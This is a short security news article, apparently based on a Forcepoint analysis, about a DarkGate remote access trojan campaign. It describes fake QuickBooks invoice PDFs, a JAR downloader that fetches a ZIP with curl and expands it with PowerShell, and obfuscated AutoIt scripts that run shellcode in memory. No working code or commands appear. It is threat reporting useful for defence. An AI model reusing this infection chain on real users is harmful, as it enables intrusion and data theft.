DarkGate, a stealthy Remote Access Trojan (RAT), propagates primarily through phishing emails with malicious attachments, which exploit common file types like XLSX, HTML, and PDF to bypass suspicion.
Once opened, the attachment infects the system and leverages hijacked email accounts to spread the malware further, making DarkGate difficult to detect and eradicate, potentially leading to data breaches, financial losses, and compromised sensitive information.
Researchers identified a Darkgate campaign using phishing emails with fake Intuit Quickbooks invoices, as the emails trick users into installing Java via a link that redirects them to a malicious URL.
The URL delivers the next stage payload, likely a malware dropper, which highlights how attackers abuse legitimate services like DoubleClick for open redirects and exploit user trust in established software (Java) to compromise systems.
A suspicious PDF document, “may-document_[number].pdf”, containing an invoice appears to be malicious. Embedded within the PDF is a large image (XObject) that contains a hyperlink.
Clicking this hyperlink triggers the download of a malicious Java Archive (.jar) file, and the URLs involved in this download follow a pattern historically associated with QakBot threat actors, typically using unique domains with single paths.
Analysis by ForcePoint of a downloaded JAR file with JD-GUI exposed a suspicious class containing an obfuscated command, which utilizes an embedded curl executable to download a ZIP file to the user’s Downloads directory (C:\Downloads).
If successful, the class triggers PowerShell to extract the ZIP’s contents using the “expand-archive” command, suggesting the JAR might be a downloader obfuscating its true functionality to fetch and unpack potentially malicious content.
A malicious JAR file downloads a ZIP archive containing an executable (.exe) for the AutoIt scripting language and a compiled AutoIt script (.a3x). The JAR file then uses an obfuscated command to execute the compiled script.
The script’s header indicates it was compiled with a recent version of AutoIt, potentially increasing its functionality, which aligns with past DarkGate campaigns known to utilize AutoIt for malicious purposes.
An attacker is using a malicious AutoIt script to bypass detection, which utilizes obfuscation techniques like BITXOR and BinaryToString() to hide its functionality, gathers a large data stream and stores it in memory for potential later use.
Additionally, DLL manipulation functions (DLLSTRUCTCREATE() and DLLSTRUCTSETDATA()) suggest interaction with system resources or memory manipulation. The script’s most critical action is likely the execution of shellcode in memory, possibly to establish a connection with a remote command-and-control server.
Also Read: Hackers Weaponize Word Files to Deliver DanaBot Malware